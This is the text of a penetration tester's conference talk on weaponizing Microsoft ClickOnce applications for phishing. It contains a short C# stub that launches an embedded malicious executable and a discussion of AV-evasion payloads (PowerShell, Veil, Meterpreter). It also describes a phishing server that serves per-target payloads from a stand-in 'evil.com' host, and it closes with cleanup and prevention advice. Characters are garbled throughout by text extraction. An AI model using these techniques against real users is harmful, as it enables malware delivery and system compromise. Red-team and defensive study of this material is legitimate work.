all you need is one -‐ a clickonce love story
TRANSCRIPT
All You Need Is One -‐ A ClickOnce Love Story
Introduc9on
• Ryan Gandrud ‒ Senior Security Consultant
• Penetra9on tester • Phishing service lead • Computer enthusiast
Overview
• ClickOnce? • Phishing-‐phriendly pheatures • Crea9ng a malicious ClickOnce applica9on • Phishing server setup • Issues and piDalls • Demo • Preven9on
ClickOnce WTF?
• ClickOnce – What is it? ‒ Executable wrapper ‒ Used to deploy installa9ons ‒ Supports mul9ple deployment methods
ClickOnce Internals
• ProjectName.applica9on ‒ Used to launch ClickOnce ‒ Contains the loca9on of the manifest and applica9on version informa9on
• ProjectName.exe.config.deploy ‒ Contains applica9on sePngs (i.e. connec9on strings, supported run9mes, etc.)
• ProjectName.exe.deploy ‒ The (poten9ally malicious) executable that will be run by a user
• ProjectName.exe.manifest ‒ Manifest file containing applica9on version, .NET versions supported, permission level requested, and signatures for the other files
‒ Contains the file name for the executable
ClickOnce Cer9ficate Signing
• Authen9code ‒ MicrosoW cert-‐based signing technology
• Necessary to “acquire” an code-‐signing Authen9code cer9ficate from a Cer9ficate Authority (CA) • Signing stages available ‒ Signed (CA) ‒ Self-‐signed (MakeCert.exe in .NET) ‒ Unsigned (No cert used)
ClickOnce Trust Architecture
• Based on different execu9on source zones • Allows permi]ed applica9ons to elevate privileges automa9cally (Trusted Sites) or through promp9ng the user • Promp9ng levels are controlled by the following registry key ‒ \HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\.NETFramework\Security\TrustManager\PrompEngLevel
ClickOnce Trust Architecture (cont.)
• These are features: "But the most important new feature when it comes to security is … the end user can elevate permissions without the help of an administrator“ • “If the applica9on permissions don't exceed policy permissions, the applica9on downloads and runs without asking the user any trust ques9ons.” • “If the applica9on needs more permissions than what's granted by policy, the user is asked if he wants to trust that applica9on and elevate permissions... If the user clicks Run, the applica9on is put into the Applica9on Trust List and is downloaded and started.”
ClickOnce Trust Architecture (cont.)
• Original trust zone configura9on during ClickOnce Beta
ClickOnce Trust Architecture (cont.)
• Modified trust architecture now in produc9on • Unsigned applica9ons from Internet zone now prompt user to elevate permissions
Owning With a Click
• Why use ClickOnce applica9on? ‒ Supported on all modern Windows opera9ng systems since it relies on .NET
‒ .NET supports backwards compa9bility within it’s own major version
‒ Dead simple to write (C#) ‒ Public browser exploits are highly version specific and more oWen than not, crash the vic9m’s browser
Owning With a Click (cont.)
• Originally meant to be deployed using Windows Internet Explorer ‒ Supported by IE 6.0+ ‒ Supported by Firefox and Chrome using third party addons (.NET 3.5+)
• Minimizes user interac9on • Delivers malicious code through mul9ple op9ons ‒ It’s a .NET project – write your own
• Include malicious executable as a resource
Payloads
• Roll your own payload ‒ Original vector
• Flagged by AV • Standard Metasploit payload ‒ Reverse_HTTPS returned broken shells
Payloads (cont.)
• Powershell ‒ Jus9n@sixdub follow up
• Great explana9on about using PowerShell commands within ClickOnce
‒ Pros: • Powershell command runs in memory – never touches disk
• AV evasion
‒ Cons: • Difficulty in changing payloads • ClickOnce is already on disk
Payloads (cont.)
• Veil-‐Evasion ‒ Pros:
• Payloads wri]en in different languages • Encrypted payloads
‒ Cons: • Sta9c “random” Meterpreter callback • Issue with how Metasploit handles stagers • Fixed with release of stageless Meterpreter
Payloads (cont.)
• Problem: ‒ Sta9c Meterpreter callbacks from targets
• Solu9on?: ‒ Dynamically genera9ng individualized Veil payloads
Crea9ng a ClickOnce Applica9on
• Visual Studio is used to create ClickOnce applica9ons ‒ The community edi9on of Visual Studio 2015 supports ClickOnce publishing
• Start a new console applica9on project within Visual Studio
Crea9ng a ClickOnce Applica9on (cont.)
• Using C# in .NET, create a new process that launches your included executable (ClickOnceInc.exe) static class Program { static void Main() { //Starting a new process executing the malicious exe System.Diagnostics.Process p = new System.Diagnostics.Process(); p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = false; p.StartInfo.FileName = "ClickOnceInc.exe"; p.Start(); } }
Crea9ng a ClickOnce Applica9on (cont.)
• Ensure that your applica9on uses the correct version of .NET so the applica9on runs properly. ‒ Windows 7 – 3.5.1 + 2.0 ‒ Windows 8 – 4.5 ‒ Windows 8.1 – 4.5.1 ‒ Windows 10 – 4.6
• Here, .NET 4.0 was chosen by naviga9ng to the Applica9on tab on the leW, and selec9ng the Target Framework from the dropdown.
Crea9ng a ClickOnce Applica9on (cont.)
Crea9ng a ClickOnce Applica9on (cont.)
• Include your malicious binary into the project by clicking and dragging it over your Solu9on Explorer
Crea9ng a ClickOnce Applica9on (cont.)
• In the Proper9es of the applica9on under Publish: ‒ Ensure the Install Mode is set to “available online only” • This prevents the applica9on from showing up in the Start Menu
‒ Clicking the Applica9on Files… bu]on • Exclude the hash for the ClickOnceInc.exe • Dynamic payload genera9on changes the hash
Crea9ng a ClickOnce Applica9on (cont.)
Crea9ng a ClickOnce Applica9on (cont.)
• Clicking the Publish bu]on, follow the wizard to publish the ClickOnce applica9on to your local drive • Should create mul9ple files/directories ‒ Applica9on Files directory ‒ Demo.applica9on ‒ Publish.htm ‒ Setup.exe
Crea9ng a ClickOnce Applica9on (cont.)
Server Setup
• Web server ‒ Kali(2.0) with Veil, Metasploit, and Apache
• Apache mod_rewrite ‒ GET evil.com?u={ID} -‐> evil.com/{ID}/evil.applica9on
‒ Combined with dynamic Veil payloads, allowed easy analy9cs and post-‐mortem data gathering.
Callback Listener
• Metasploit listener ‒ Phishing scenario – targets are worksta9ons ‒ Most likely have outbound h]p access ‒ Limited window of engagement
PiDalls
• Outdated packages / dependencies ‒ Veil, Python, Wine.
• Signing restric9ons ‒ No signing allowed with dynamic payloads
• No easy way to use mage.exe on linux ‒ Self-‐signed certs are only marginally be]er
Cleanup
• ClickOnce install directory: ‒ %LOCALAPPDATA%\Apps\2.0\{machine-‐specific}\{machine-‐specific}\{obfuscated-‐app-‐name} • C:\Users\Bob\AppData\Local\Apps\2.0\F3RBL2XD.32Y\Z3R2E8LL.92S\{app-‐folder}
Cleanup
• Add/Remove Programs • Delete relevant AppData folder • Nuke everything:
‒ Note: This will clear the en9re online applica9on cache.
‒ No need for elevated privileges, AppCaches are user-‐specific.
rundll32 dfshim CleanOnlineAppCache
Demo
• Client: ‒ Windows 10
• Server (hack.me): ‒ Kali 2.0 running Apache to serve file ‒ Metasploit listener running to catch callback
Preventa9ve Measures
• Typical An9-‐Phishing Techniques In Place ‒ User educa9on ‒ Endpoint protec9on ‒ Least privileged configura9ons
• Helpful, but not effec9ve enough
Preventa9ve Measures
• ClickOnce-‐Specific Techniques ‒ Code Access Security
• ClickOnce applica9ons can specify a “permissions level”
• Default: Full Trust – Requires prompt for eleva9on
Preventa9ve Measures
• Disabling Trust Prompt ‒ \HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\.NETFramework\Security\TrustManager\Promp9ngLevel
‒ Trust prompt is controlled by zone • Untrusted Sites • Internet • My Computer • Local Intranet • Trusted Sites
Preventa9ve Measures
Preventa9ve Measures
• Windows 8/10 ‒ SmartScreen Filter
• Enabled by default • Default ‘OK’ ac9on results in applica9on not running
Ques9ons?
More Informa9on / References
• Alice in Warningland: A Large-‐Scale Field Study of Browser Security Warning Effec9veness ‒ Devda]a Akhawe University of California, Berkeley,
devda][email protected] ‒ Adrienne Porter Felt Google, Inc, [email protected]
• h]p://leastprivilege.com/2006/02/18/beware-‐be-‐aware-‐of-‐clickonce-‐default-‐sePngs/
• h]ps://msdn.microsoW.com/en-‐us/library/aa719097(v=vs.71).aspx • h]ps://msdn.microsoW.com/en-‐us/library/cc176048(v=vs.90).aspx • h]ps://msdn.microsoW.com/en-‐us/library/ee308453.aspx • h]ps://robindotnet.wordpress.com/2013/02/24/windows-‐8-‐and-‐
clickonce-‐the-‐defini9ve-‐answer-‐2/ • h]ps://blog.netspi.com/bypassing-‐av-‐with-‐veil-‐evasion/ • h]ps://github.com/rapid7/metasploit-‐framework/issues/4895 • h]p://www.sixdub.net/?p=555